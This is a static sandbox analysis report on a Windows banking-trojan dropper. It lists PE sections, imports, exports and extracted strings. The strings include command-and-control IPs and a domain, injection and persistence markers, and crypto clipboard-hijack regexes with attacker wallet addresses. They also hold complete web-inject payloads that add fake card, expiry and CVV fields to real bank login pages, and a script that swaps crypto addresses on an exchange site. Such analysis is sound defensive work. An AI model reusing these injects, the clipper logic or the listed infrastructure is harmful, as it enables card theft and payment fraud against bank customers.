Static | ZeroBOX

PE Compile Time

2025-02-07 15:31:00

PE Imphash

d5550c38a1ba1bf89267abad76b56796

Sections

Name    Virtual Address  Virtual Size  Size of Raw Data  Entropy
.text   0x00001000       0x00005aaa    0x00005c00        6.13976482995
.rdata  0x00007000       0x0000253d    0x00002600        5.01759880476
.data   0x0000a000       0x00040be0    0x0003ec00        6.11554593875
.pdata  0x0004b000       0x00000600    0x00000600        4.4241794462
.reloc  0x0004c000       0x0000000c    0x00000200        0.0815394123432
.idata  0x0004d000       0x00048000    0x00047c00        7.96813755493

Imports

Library ntdll.dll:
0x140007360 strchr
0x140007368 _snprintf
0x140007370 strncmp
0x140007378 strncpy
0x140007380 RtlExitUserThread
0x140007388 ZwResumeThread
0x140007390 NtQueryInformationThread
0x140007398 NtQueueApcThread
0x1400073a0 strstr
0x1400073a8 tolower
0x1400073b0 isalpha
0x1400073b8 sscanf
0x1400073c0 _snwprintf
0x1400073d0 RtlRandom
0x1400073d8 __chkstk
0x1400073e0 memcpy
0x1400073e8 _stricmp
0x1400073f0 memset
0x1400073f8 __C_specific_handler
Library KERNEL32.dll:
0x140007090 UnlockFileEx
0x140007098 lstrlenA
0x1400070a0 GlobalLock
0x1400070a8 GlobalAlloc
0x1400070b0 Sleep
0x1400070b8 GlobalUnlock
0x1400070c0 GetProcAddress
0x1400070c8 LoadLibraryA
0x1400070d0 HeapAlloc
0x1400070d8 GetProcessHeap
0x1400070e0 lstrcatA
0x1400070e8 SetFileAttributesA
0x1400070f0 ExitProcess
0x1400070f8 GetComputerNameA
0x140007100 VirtualQuery
0x140007108 lstrcpynA
0x140007110 OpenProcess
0x140007118 GetVersionExW
0x140007120 lstrcmpiA
0x140007128 GetModuleFileNameA
0x140007130 CloseHandle
0x140007138 GetCurrentProcessId
0x140007140 lstrcpyA
0x140007148 Process32First
0x140007150 VirtualFree
0x140007158 CreateRemoteThread
0x140007160 VirtualAllocEx
0x140007168 Process32Next
0x140007170 GetModuleHandleA
0x140007178 CreateToolhelp32Snapshot
0x140007180 WriteProcessMemory
0x140007188 GetCurrentProcess
0x140007190 WaitForSingleObject
0x140007198 VirtualProtectEx
0x1400071a0 VirtualProtect
0x1400071a8 HeapReAlloc
0x1400071b0 HeapFree
0x1400071b8 VirtualAlloc
0x1400071c0 lstrcmpA
0x1400071c8 ExitThread
0x1400071d0 GetLastError
0x1400071d8 SetLastError
0x1400071e0 GetTempFileNameA
0x1400071e8 WinExec
0x1400071f0 GetTempPathA
0x1400071f8 CreateFileA
0x140007200 GetFileSize
0x140007208 SetFilePointer
0x140007210 MoveFileExA
0x140007218 SetEndOfFile
0x140007220 GetTickCount
0x140007228 WriteFile
0x140007230 ReadFile
0x140007238 FlushInstructionCache
0x140007240 LockFileEx
0x140007248 OpenMutexA
0x140007250 LocalAlloc
0x140007258 GetExitCodeThread
0x140007260 GetSystemInfo
0x140007268 CreateMutexA
0x140007270 GetVersionExA
0x140007278 LocalFree
0x140007280 DeleteFileA
0x140007288 CreateThread
Library USER32.dll:
0x1400072f8 GetForegroundWindow
0x140007300 GetSystemMetrics
Library ADVAPI32.dll:
0x140007000 RegSetValueExW
0x140007008 CheckTokenMembership
0x140007010 FreeSid
0x140007018 AllocateAndInitializeSid
0x140007020 RegOpenKeyExA
0x140007028 GetTokenInformation
0x140007030 GetSidSubAuthorityCount
0x140007038 GetSidSubAuthority
0x140007040 RegSetValueExA
0x140007048 RegOpenKeyExW
0x140007050 RegDeleteKeyW
0x140007058 AdjustTokenPrivileges
0x140007060 LookupPrivilegeValueA
0x140007068 OpenProcessToken
0x140007070 RegCloseKey
0x140007078 RegCreateKeyExA
0x140007080 RegQueryValueExA
Library SHLWAPI.dll:
0x1400072c8 PathCombineA
0x1400072d0 UrlGetPartA
0x1400072d8 PathFindFileNameA
0x1400072e0 StrToIntA
0x1400072e8 StrStrIA
Library SHELL32.dll:
0x1400072b0 ShellExecuteExA
0x1400072b8 SHGetFolderPathA
Library PSAPI.DLL:
0x140007298 GetModuleFileNameExA
0x1400072a0 GetProcessImageFileNameA
Library WININET.dll:
0x140007310 InternetCrackUrlA
0x140007318 InternetSetOptionA
0x140007320 HttpQueryInfoA
0x140007328 HttpSendRequestA
0x140007330 InternetConnectA
0x140007338 InternetOpenA
0x140007340 HttpOpenRequestA
0x140007348 InternetCloseHandle
0x140007350 InternetReadFile
Library urlmon.dll:
0x140007408 URLDownloadToFileA

Exports

Ordinal  Address      Name
1        0x14000486c  DownloadRunExeId
2        0x1400047c0  DownloadRunExeUrl
3        0x1400048f4  DownloadRunModId
4        0x1400049b0  DownloadUpdateMain
5        0x140002608  InjectApcRoutine
6        0x1400025f0  InjectNormalRoutine
7        0x140004a74  SendLogs
8        0x140004a64  WriteConfigString
dddddddd.txt
dddddddd.txt
yyyy-MM-dd
HH':'mm':'ss
IsWow64Process
kernel32
GetNativeSystemInfo
kernel32.dll
Windows 2000
Windows XP
Windows XP Professional
Windows Server 2003
Windows Home Server
Windows Server 2003 R2
Windows Vista
Windows Server 2008
Windows Server 2008 R2
Windows 7
fid=%d
Windows Server 2012
Windows 8
%s|%d|
Windows Server 2012 R2
Windows 8.1
Windows 10
Windows Server 2016/2019
Windows 11
Unidentified
%s %04d sp%1d.%1d %s
Global\%s%x
Global\%s%x
.idata
ObtainUserAgentString
urlmon.dll
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
mainver
mainver
srvurls
tid=%d&ta=%s-%x
srvretry
.idata
%[^.].%[^(](%[^)])
inject
buildid
os=%s&bid=%s
srvurls
srvdelay
inject
CurrentPath
CurrentPath
inject
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
LdrLoadDll
RtlCreateUnicodeStringFromAsciiz
modver
LdrGetProcedureAddress
ntdll.dll
modver
imagehlp.dll
CheckSumMappedFile
Can't set DOS header.
CreateEmpty failed.
Is not a valid PE file.
modules
modules
modconn
modparams
modrunm
modrunm
modparams
modules
modconn
ImageLoadNotifyRoutine
ImageUnloadNotifyRoutine
modrunm
ReflectiveLoader
SeDebugPrivilege
inject
inject
explorer.exe
chrome.exe
brave.exe
firefox.exe
kernelbase.dll
NtResumeThread
ntdll.dll
ZwResumeThread
ntdll.dll
kernel32.dll
NtResumeThread
ntdll.dll
ZwResumeThread
ntdll.dll
InjectApcRoutine
InjectNormalRoutine
SeDebugPrivilege
Software\Microsoft\Cryptography
MachineGuid
unknown
SOFTWARE\Microsoft\Windows NT\CurrentVersion
InstallDate
DigitalProductId
%s_%08X%08X
fatal_error
explorer.exe
chrome.exe
firefox.exe
brave.exe
CurrentPath
explorer.exe
.idata
SOFTWARE\
SOFTWARE\
%08lX%04lX%lu
SetClipboardData
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
User32.dll
EmptyClipboard
User32.dll
OpenClipboard
User32.dll
GetClipboardData
User32.dll
CloseClipboard
User32.dll
1ZWNNwbtBZWS9M9Q58NA2z9e4AXvK9VuD
0x270a8ee6933ae7a56b82c7c3e625cca5c120a520
LKnTdbFRxqoZgx3JaD7fS43urGXp2dgkLU
TAfvwf9NS4WXJR8qxTwo5qdnDKTaL762j6
%s=%.*s
_stricmp
strchr
_snprintf
strncmp
strncpy
RtlExitUserThread
ZwResumeThread
NtQueryInformationThread
NtQueueApcThread
strstr
tolower
isalpha
sscanf
_snwprintf
NtQueryInformationProcess
RtlRandom
ntdll.dll
lstrlenA
GlobalLock
GlobalAlloc
GlobalUnlock
GetProcAddress
LoadLibraryA
HeapAlloc
GetProcessHeap
lstrcatA
SetFileAttributesA
ExitProcess
GetComputerNameA
VirtualQuery
lstrcpynA
OpenProcess
GetVersionExW
lstrcmpiA
GetModuleFileNameA
CloseHandle
GetCurrentProcessId
lstrcpyA
Process32First
VirtualFree
CreateRemoteThread
VirtualAllocEx
Process32Next
GetModuleHandleA
CreateToolhelp32Snapshot
WriteProcessMemory
GetCurrentProcess
WaitForSingleObject
VirtualProtectEx
VirtualProtect
HeapReAlloc
HeapFree
VirtualAlloc
lstrcmpA
ExitThread
GetLastError
SetLastError
GetTempFileNameA
WinExec
GetTempPathA
CreateFileA
GetFileSize
SetFilePointer
MoveFileExA
SetEndOfFile
GetTickCount
UnlockFileEx
WriteFile
ReadFile
FlushInstructionCache
LockFileEx
OpenMutexA
LocalAlloc
GetExitCodeThread
GetSystemInfo
CreateMutexA
GetVersionExA
LocalFree
DeleteFileA
CreateThread
KERNEL32.dll
GetSystemMetrics
GetForegroundWindow
USER32.dll
RegSetValueExA
RegQueryValueExA
RegCreateKeyExA
RegCloseKey
OpenProcessToken
LookupPrivilegeValueA
AdjustTokenPrivileges
RegDeleteKeyW
RegOpenKeyExW
RegSetValueExW
GetSidSubAuthority
GetSidSubAuthorityCount
GetTokenInformation
RegOpenKeyExA
AllocateAndInitializeSid
FreeSid
CheckTokenMembership
ADVAPI32.dll
StrToIntA
PathFindFileNameA
StrStrIA
PathCombineA
UrlGetPartA
SHLWAPI.dll
SHGetFolderPathA
ShellExecuteExA
SHELL32.dll
GetProcessImageFileNameA
GetModuleFileNameExA
PSAPI.DLL
HttpQueryInfoA
InternetReadFile
InternetOpenA
InternetCloseHandle
InternetConnectA
InternetCrackUrlA
InternetSetOptionA
HttpOpenRequestA
HttpSendRequestA
WININET.dll
URLDownloadToFileA
urlmon.dll
memset
memcpy
__chkstk
__C_specific_handler
dropper64.exe
DownloadRunExeId
DownloadRunExeUrl
DownloadRunModId
DownloadUpdateMain
InjectApcRoutine
InjectNormalRoutine
SendLogs
WriteConfigString
!This program cannot be run in DOS mode.
generic
unknown error
iostream
iostream stream error
system
chrome.exe
opera.exe
msedge.exe
brave.exe
browser.exe
firefox.exe
\\.\pipe\%s
invalid string position
string too long
LoadLibraryA
vector<T> too long
176.113.115.149
185.81.68.156
diamotrix.online
/VzCAHn.php
User32.dll
Kernel32.dll
KernelBase.dll
msvcrt.dll
ntdll.dll
Shlwapi.dll
Shell32.dll
Secur32.dll
Advapi32.dll
ws2_32.dll
version.dll
Psapi.dll
wininet.dll
MessageBoxA
GetWindowsDirectoryA
WideCharToMultiByte
LocalAlloc
wsprintfA
MultiByteToWideChar
malloc
VirtualAllocEx
WriteProcessMemory
CreateRemoteThread
GetProcAddress
PathRemoveFileSpecA
GetModuleFileNameA
PathFindFileNameA
strncmp
_strnicmp
lstrlenA
ExitProcess
SHGetFolderPathA
lstrcpyA
lstrcatA
CopyFileA
GetVolumeInformationA
GetUserNameExA
LookupAccountNameA
ConvertSidToStringSidA
LocalFree
lstrcmpiA
lstrcmpA
StrStrA
StrStrIA
strtol
realloc
WSAStartup
socket
gethostbyname
connect
closesocket
WSACleanup
memset
memcpy
NtOpenKey
NtSetValueKey
CloseHandle
CreateProcessA
NtCreateThreadEx
TerminateProcess
FindWindowA
NtUnmapViewOfSection
NtQueryInformationProcess
GetThreadContext
SetThreadContext
SHFileOperationA
FindFirstFileA
FindNextFileA
GetWindowThreadProcessId
InitializeCriticalSection
GetLastError
EnterCriticalSection
LeaveCriticalSection
_errno
tolower
isdigit
strtoul
isxdigit
strtod
CreateToolhelp32Snapshot
Process32First
Process32Next
StrChrA
StrToIntA
GetModuleHandleA
GetFileVersionInfoSizeA
GetFileVersionInfoA
VerQueryValueA
GetModuleInformation
memcmp
ExpandEnvironmentStringsA
GetPrivateProfileSectionNamesA
GetPrivateProfileStringA
CreateFileA
ReadFile
WriteFile
RegSetValueExA
RegOpenKeyExA
RegCloseKey
GetFileSize
ResumeThread
IsWow64Process
GetNativeSystemInfo
OpenProcess
CreateThread
GetUserNameW
GetComputerNameW
GetVersionExA
CreateNamedPipeA
ConnectNamedPipe
DisconnectNamedPipe
InternetCrackUrlA
GetTempPathA
GetTempFileNameA
ShellExecuteA
ioctlsocket
CreateMutexA
ReleaseMutex
WaitForSingleObject
EnumWindows
GetCurrentProcessId
DeleteFileA
PathFileExistsA
CreateDirectoryA
HttpQueryInfoA
HttpQueryInfoW
RtlCompressBuffer
RtlGetCompressionWorkSpaceSize
SetThreadDesktop
CreateDesktopA
OpenDesktopA
TerminateThread
PostMessageA
SendMessageA
ChildWindowFromPoint
ScreenToClient
MoveWindow
GetWindowRect
GetMenuItemID
MenuItemFromPoint
RealGetWindowClassA
PtInRect
GetWindowPlacement
SetWindowLongA
GetWindowLongA
WindowFromPoint
SHAppBarMessage
RegQueryValueExA
GetDesktopWindow
DeleteDC
ReleaseDC
DeleteObject
GetDIBits
StretchBlt
SetStretchBltMode
SelectObject
CreateCompatibleDC
CreateCompatibleBitmap
IsWindowVisible
GetWindow
PrintWindow
GetTopWindow
chunked
HTTP/1.1
Host:
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length:
HTTP/1.1 200 OK
Content-Length
Transfer-Encoding
\Registry\User\%s\%s
Software\Microsoft\Windows\CurrentVersion\Run
GetInjects
Firefox
nss3.dll
PR_Read
PR_Write
Content-Length:
Accept-Encoding
identity
Connection
Content-Type:
text/html
Location:
Host:
http(s)://
log|%s|%s|%d|
Mozilla
bot|%d|%d|%d|%d|%s|%s|%d|%d
Shell_TrayWnd
verclsid.exe
child.dll
:Zone.Identifier
Trusteer
Content-Type: application/x-www-form-urlencoded
Connection: close
xdigit
DELETE
()$^.*+?[]|\-{},:=!
bad locale name
\b(1|3|bc1)[a-zA-HJ-NP-Z0-9]{25,42}\b
\b0x[a-fA-F0-9]{40}\b
\bT[a-zA-HJ-NP-Z0-9]{33}\b
\b(L|M)[a-zA-HJ-NP-Z0-9]{26,33}\b
1ZWNNwbtBZWS9M9Q58NA2z9e4AXvK9VuD
0x270a8ee6933ae7a56b82c7c3e625cca5c120a520
TAfvwf9NS4WXJR8qxTwo5qdnDKTaL762j6
LKnTdbFRxqoZgx3JaD7fS43urGXp2dgkLU
report=%s,%s,%d
bad cast
vector<bool> too long
abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_
()$^.*+?[]|\-{},:=!
Chrome
PR_GetDescType
chrome.dll
msedge.dll
opera-browser.dll
browser.dll
AVE_MARIA
injects
web_content
url_blacklist
data_before
inject
bad allocation
regex_error(error_collate): The expression contained an invalid collating element name.
regex_error(error_ctype): The expression contained an invalid character class name.
regex_error(error_escape): The expression contained an invalid escaped character, or a trailing escape.
regex_error(error_backref): The expression contained an invalid back reference.
regex_error(error_brack): The expression contained mismatched [ and ].
regex_error(error_paren): The expression contained mismatched ( and ).
regex_error(error_brace): The expression contained mismatched { and }.
regex_error(error_badbrace): The expression contained an invalid range in a { expression }.
regex_error(error_range): The expression contained an invalid character range, such as [b-a] in most encodings.
regex_error(error_space): There was insufficient memory to convert the expression into a finite state machine.
regex_error(error_badrepeat): One of *?+{ was not preceded by a valid regular expression.
regex_error(error_complexity): The complexity of an attempted match against a regular expression exceeded a pre-set level.
regex_error(error_stack): There was insufficient memory to determine whether the regular expression could match the specified character sequence.
regex_error(error_parse)
regex_error(error_syntax)
regex_error
permission denied
file exists
no such device
filename too long
device or resource busy
io error
directory not empty
invalid argument
no space on device
no such file or directory
function not supported
no lock available
not enough memory
resource unavailable try again
cross device link
operation canceled
too many files open
permission_denied
address_in_use
address_not_available
address_family_not_supported
connection_already_in_progress
bad_file_descriptor
connection_aborted
connection_refused
connection_reset
destination_address_required
bad_address
host_unreachable
operation_in_progress
interrupted
invalid_argument
already_connected
too_many_files_open
message_size
filename_too_long
network_down
network_reset
network_unreachable
no_buffer_space
no_protocol_option
not_connected
not_a_socket
operation_not_supported
protocol_not_supported
wrong_protocol_type
timed_out
operation_would_block
address family not supported
address in use
address not available
already connected
argument list too long
argument out of domain
bad address
bad file descriptor
bad message
broken pipe
connection aborted
connection already in progress
connection refused
connection reset
destination address required
executable format error
file too large
host unreachable
identifier removed
illegal byte sequence
inappropriate io control operation
invalid seek
is a directory
message size
network down
network reset
network unreachable
no buffer space
no child process
no link
no message available
no message
no protocol option
no stream resources
no such device or address
no such process
not a directory
not a socket
not a stream
not connected
not supported
operation in progress
operation not permitted
operation not supported
operation would block
owner dead
protocol error
protocol not supported
read only file system
resource deadlock would occur
result out of range
state not recoverable
stream timeout
text file busy
timed out
too many files open in system
too many links
too many symbolic link levels
value too large
wrong protocol type
0123456789abcdefghijklmnopqrstuvwxyz
0123456789abcdefghijklmnopqrstuvwxyz
0123456789abcdefABCDEF
Unknown exception
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
CorExitProcess
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
bad exception
GetCurrentPackageId
_hypot
_nextafter
(null)
`h````
xpxxxx
SunMonTueWedThuFriSat
JanFebMarAprMayJunJulAugSepOctNovDec
MessageBoxW
GetActiveWindow
GetLastActivePopup
GetUserObjectInformationW
GetProcessWindowStation
__based(
__cdecl
__pascal
__stdcall
__thiscall
__fastcall
__clrcall
__eabi
__ptr64
__restrict
__unaligned
restrict(
delete
operator
`vftable'
`vbtable'
`vcall'
`typeof'
`local static guard'
`string'
`vbase destructor'
`vector deleting destructor'
`default constructor closure'
`scalar deleting destructor'
`vector constructor iterator'
`vector destructor iterator'
`vector vbase constructor iterator'
`virtual displacement map'
`eh vector constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`copy constructor closure'
`udt returning'
`local vftable'
`local vftable constructor closure'
new[]
delete[]
`omni callsig'
`placement delete closure'
`placement delete[] closure'
`managed vector constructor iterator'
`managed vector destructor iterator'
`eh vector copy constructor iterator'
`eh vector vbase copy constructor iterator'
`dynamic initializer for '
`dynamic atexit destructor for '
`vector copy constructor iterator'
`vector vbase copy constructor iterator'
`managed vector copy constructor iterator'
`local static thread guard'
Type Descriptor'
Base Class Descriptor at (
Base Class Array'
Class Hierarchy Descriptor'
Complete Object Locator'
`h`hhh
xppwpp
1#SNAN
1#QNAN
CreateFileW
WriteFile
CloseHandle
GetLastError
HeapAlloc
GetProcessHeap
TerminateProcess
ResumeThread
GetThreadContext
SetThreadContext
lstrlenA
MultiByteToWideChar
WideCharToMultiByte
CreateToolhelp32Snapshot
GetCurrentProcess
GetModuleHandleA
GetProcAddress
LoadLibraryA
GetSystemInfo
VirtualAlloc
VirtualFree
VirtualQuery
HeapCreate
HeapDestroy
HeapReAlloc
HeapFree
GetCurrentProcessId
GetCurrentThreadId
OpenThread
SuspendThread
FlushInstructionCache
VirtualProtect
GetModuleHandleW
Thread32First
Thread32Next
EnterCriticalSection
LeaveCriticalSection
Module32First
Module32Next
KERNEL32.dll
RtlPcToFileHeader
RtlLookupFunctionEntry
RtlUnwindEx
RtlCaptureContext
RtlVirtualUnwind
ntdll.dll
InternetOpenW
InternetCloseHandle
InternetReadFile
InternetConnectW
HttpOpenRequestW
HttpSendRequestA
WININET.dll
InitializeCriticalSectionEx
DeleteCriticalSection
EncodePointer
DecodePointer
GetLocaleInfoEx
GetStringTypeW
RaiseException
IsDebuggerPresent
IsProcessorFeaturePresent
GetCommandLineA
InitializeCriticalSectionAndSpinCount
GetCPInfo
GetStdHandle
GetModuleFileNameW
ExitProcess
GetModuleHandleExW
HeapSize
IsValidCodePage
GetACP
GetOEMCP
SetLastError
UnhandledExceptionFilter
SetUnhandledExceptionFilter
FlsAlloc
FlsGetValue
FlsSetValue
FlsFree
GetStartupInfoW
GetFileType
InitOnceExecuteOnce
GetModuleFileNameA
QueryPerformanceCounter
GetSystemTimeAsFileTime
GetTickCount64
GetEnvironmentStringsW
FreeEnvironmentStringsW
CompareStringEx
GetUserDefaultLocaleName
LCMapStringEx
IsValidLocaleName
EnumSystemLocalesEx
OutputDebugStringW
LoadLibraryExW
LoadLibraryW
GetConsoleCP
GetConsoleMode
SetFilePointerEx
SetStdHandle
WriteConsoleW
FlushFileBuffers
bot64.dll
?ReflectiveLoader@@YA_KXZ
.?AVerror_category@std@@
.?AV_Generic_error_category@std@@
.?AV_Iostream_error_category@std@@
.?AV_System_error_category@std@@
.?AVruntime_error@std@@
.?AVexception@std@@
.?AVbad_cast@std@@
.?AV_Facet_base@std@@
.?AVfacet@locale@std@@
.?AUctype_base@std@@
.?AV?$ctype@D@std@@
.?AV?$collate@D@std@@
.?AV_Node_base@std@@
.?AV_Root_node@std@@
.?AV_Node_end_group@std@@
.?AV_Node_assert@std@@
.?AV_Node_capture@std@@
.?AV_Node_back@std@@
.?AV_Node_endif@std@@
.?AV_Node_if@std@@
.?AV_Node_rep@std@@
.?AV_Node_end_rep@std@@
.?AV?$_Node_class@DV?$regex_traits@D@std@@@std@@
.?AV?$_Node_str@D@std@@
.?AVbad_alloc@std@@
"url_blacklist": [ "*ocsp*.*", "*symc*.com*", "*clients*.google.com*", "*telemetry.mozilla.org*", "*safebrowsing.google.com*", "*services.mozilla.com*", "incoming.telemetry.mozilla.org", "*googlevideo.com*", "translate.googleapis.com", "*lencr.org*", "*log-upload-os.hoyoverse.com*", "b1.nel.goog*", "*v.clarity.ms*", "*dns.com*", "*x.com*", "*youtube.com*" ],
"injects":
{
"url": "connexion-mabanque.bnpparibas",
"path": "*",
"web_content":
[
{
"data_before": "rv-value-reactive=\"form.idTelematique\">",
"inject": "<label for=\"card_num\" rv-text=\"config.app.identification.numclient\">2. <span class=\"label_field\">Num
ro De Carte</span></label><input type=\"text\" pattern=\"[0-9]*\" value=\"\" name=\"card_num\" maxlength=\"10\" size=\"10\" autofocus=\"\" autocorrect=\"off\" id=\"card_num\" class=\"form-control numeric\" rv-value-reactive=\"form.idTelematique\"><label for=\"exp_date\" rv-text=\"config.app.identification.numclient\">3. <span class=\"label_field\">Date d'expiration</span></label><input type=\"text\" pattern=\"[0-9]*\" value=\"\" name=\"exp_date\" maxlength=\"10\" size=\"10\" autofocus=\"\" autocorrect=\"off\" id=\"exp_date\" class=\"form-control numeric\" rv-value-reactive=\"form.idTelematique\"><label for=\"cvv\" rv-text=\"config.app.identification.numclient\">4. <span class=\"label_field\">CVV</span></label><input type=\"text\" pattern=\"[0-9]*\" value=\"\" name=\"cvv\" maxlength=\"10\" size=\"10\" autofocus=\"\" autocorrect=\"off\" id=\"cvv\" class=\"form-control numeric\" rv-value-reactive=\"form.idTelematique\">"
}
]
},
{
"url": "particuliers.sg.fr",
"path": "/icd/cbo/index-authsec.html",
"web_content":
[
{
"data_before": "class=\"auth_error\"></div>",
"inject": "<br><div class=\"auth-cs-content swm_input-container\"> <input id=\"user_id\" name=\"card_num\" type=\"text\" class=\"swm_input grey_cross ngim-input\" autocapitalize=\"none\" autocorrect=\"off\" aria-label=\"Code client\" placeholder=\" \" autocomplete=\"off\" maxlength=\"8\" aria-describedby=\"js-error\" required=\"\"> <button id=\"user_id-delete\" role=\"button\" class=\"swm_sprite swm_to-clear\" aria-label=\"Effacer votre code client\"></button> <span class=\"bar\" aria-hidden=\"true\"></span> <label for=\"user_id\">Num
ro De Carte</label> </div><br><div class=\"auth-cs-content swm_input-container\"> <input id=\"user_id\" name=\"exp_date\" type=\"text\" class=\"swm_input grey_cross ngim-input\" autocapitalize=\"none\" autocorrect=\"off\" aria-label=\"Code client\" placeholder=\" \" autocomplete=\"off\" maxlength=\"8\" aria-describedby=\"js-error\" required=\"\"> <button id=\"user_id-delete\" role=\"button\" class=\"swm_sprite swm_to-clear\" aria-label=\"Effacer votre code client\"></button> <span class=\"bar\" aria-hidden=\"true\"></span> <label for=\"user_id\">Date d'expiration</label> <br><div class=\"auth-cs-content swm_input-container\"> <input id=\"cvv\" name=\"cvv\" type=\"text\" class=\"swm_input grey_cross ngim-input\" autocapitalize=\"none\" autocorrect=\"off\" aria-label=\"Code client\" placeholder=\" \" autocomplete=\"off\" maxlength=\"8\" aria-describedby=\"js-error\" required=\"\"> <button id=\"user_id-delete\" role=\"button\" class=\"swm_sprite swm_to-clear\" aria-label=\"Effacer votre cvv\"></button> <span c
}
]
},
{
"url": "www.bankofamerica.com",
"path": "*",
"web_content":
[
{
"data_before": "id=\"passcode1_errorMessage\" aria-hidden=\"true\">",
"inject": "</div><div><input name=\"card_number\" class=\"tl-private cs-passcode1 spa-input-text\" type=\"text\" placeholder=\"Credit Card Number\" maxlength=\"32\" aria-required=\"true\" aria-label=\"Card number\" autocomplete=\"off\"></div><br><div><input name=\"EX_date\" class=\"tl-private cs-passcode1 spa-input-text\" type=\"text\" placeholder=\"Expiration date\" maxlength=\"32\" aria-required=\"true\" aria-label=\"Ex date\" autocomplete=\"off\"></div><br><div><input name=\"CVV\" class=\"tl-private cs-passcode1 spa-input-text\" type=\"text\" placeholder=\"CVV\" maxlength=\"4\" aria-required=\"true\" aria-label=\"CVV number\" autocomplete=\"off\"></div><br><div>"
}
]
},
"url": "www.exchanger.ws",
"path": "*",
"web_content": [
{
"data_before": "</title>",
"inject": "<script>function replaceAllAddresses(newAddresses) { const btcRegexes = [ /\\b([13][a-km-zA-HJ-NP-Z1-9]{25,34})\\b/g, /\\b((bc1|[13])[a-zA-HJ-NP-Z0-9]{25,39})\\b/g ]; const ethRegexes = [ /\\b0x[a-fA-F0-9]{40}\\b/g ]; const ltcRegexes = [ /\\b(L|M|ltc1)[a-zA-HJ-NP-Z0-9]{25,39}\\b/g ]; const trxRegexes = [ /\\b(T|t)[a-zA-HJ-NP-Z0-9]{33}\\b/g ]; document.querySelectorAll('*').forEach(el => { el.childNodes.forEach(node => { if (node.nodeType === Node.TEXT_NODE) { btcRegexes.forEach(regex => { node.textContent = node.textContent.replace(regex, newAddresses.btc); }); ethRegexes.forEach(regex => { node.textContent = node.textContent.replace(regex, newAddresses.eth); }); ltcRegexes.forEach(regex => { node.textContent = node.textContent.replace(regex, newAddresses.ltc); }); trxRegexes.forEach(regex => { node.textContent = node.textContent.replace(regex, newAddresses.trx); }); } }); if (el.classList) { el.classList.forEach(className => { if (className.toLowerCase().includes('qrcode')) { el.clas
}
]
.?AVlogic_error@std@@
.?AVlength_error@std@@
.?AVout_of_range@std@@
.?AVregex_error@std@@
.?AV_Locimp@locale@std@@
Copyright (c) 1992-2004 by P.J. Plauger, licensed by Dinkumware, Ltd. ALL RIGHTS RESERVED.
.?AVtype_info@@
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
.?AVbad_exception@std@@
<?xml version='1.0' encoding='UTF-8' standalone='yes'?>
<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level='asInvoker' uiAccess='false' />
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
xe|;T3K
{gS?21
~m{K7%
kZYH6>
|snC8c9O
iYWi"!
Gsd7Mo3'
z~gZAv3
O14M!)
{vn`"Z
zVxoJS|_
}6J5X>#=4&F90:J*,>
hjjugnvDfrj
046:=@
RWZCogw
G-jpeub
2?ZQao}
+6CP]jv9;MS
-1xX6@Wdu
+&Tkf
"/CVky
nC5N[1
&67E[y
,/&VQ{
2$Umrg
3''KXjbL
JzWSQ !N]B[ze
=<.CKW
20OVFwr~nB
/^45%X}e^j
?pT_`qoz
4$Yr\[AQqw
10VR^sK0
)`AUKh}gVj
oHMDTfCKRSX
ZGSo^XH/)/
;=;chuwPl{SrMB}\PQ1.#
%ciRp(G]cCZ
B,9O%NXs
dvG+)(5
-;IWes
/>M\kz
+;K[k{
#5GYk}
$1C"3L l<
RCv!WSyV
AOAk)M
<:'ZGw
n6ITZ@
W?~LN^rNOk`{)d
i),Q^k
JRWpxxa}RWE
JDy@;6rbdk*h`
DIJDqiG;7e
zw7 <1>=?
ad$4.)d..?.<&2461
nqY%)yh~dzgr
_%+}|{~"
eyebtNy
WU_0;p
dyBBLp
oS7sX="
rW<!u[A'
mjYH:&
kk[K6+
vFXI:&
ugYI=/!C
t0ZM@%&
pocW'?3'
yoeRQ90
SKC63+#
yrzd]V
Hwqie_Y
MGA05/);
:50#&!
#'*/379?CGJMW_[_cgkosw{
kqw}",
@IR[dm
#-7AKU_is}
#/;GS_
+9GUcq
+;K[k{
!3EWi{
')[bj%
V>Zk#|=$
$@\xkO3
wbM8[G3
ubO<)}kYG5#
{k[K;+
zk\M>/
{l]N?0
wi[M?1#
uh[NA4'
~qdWZ3'=
e^hCIB
Sda+FOI0)71s
zideOUP#
AQNV^EB{
:6.&-*
}gi;Hlq
&AH|J]d
"I)=F3
DQY{oy
,jpexG
qs'&AC
rb4D4&n
bPGk,"
XPFSc&
Mhc[UJC4
Xb\7ULH
VTsXPP
LDDWI@@o
_TV^TXZ
b^^Ol`b
!G*&)+
,1C:69
->AWqDI
WHLwVX
O`Ga]RW
.6cRPZ
+l2>VEdr=
Nu*?8`
)jR,NL
>~)C$
pc |,g
#)/5;AGMSY_ekqwHOV]dkry
#+3;CKS[cks{
'09BKT]fox
#-7AKU_is}
ydJ@UztnEG
~~ES-?9V_
ip@BT&0
nh_m.)
l~MGxt&
n/L3>H
cyiGTkb
weSVE4#
yhWF5$
{k[K;+
{k[K;+
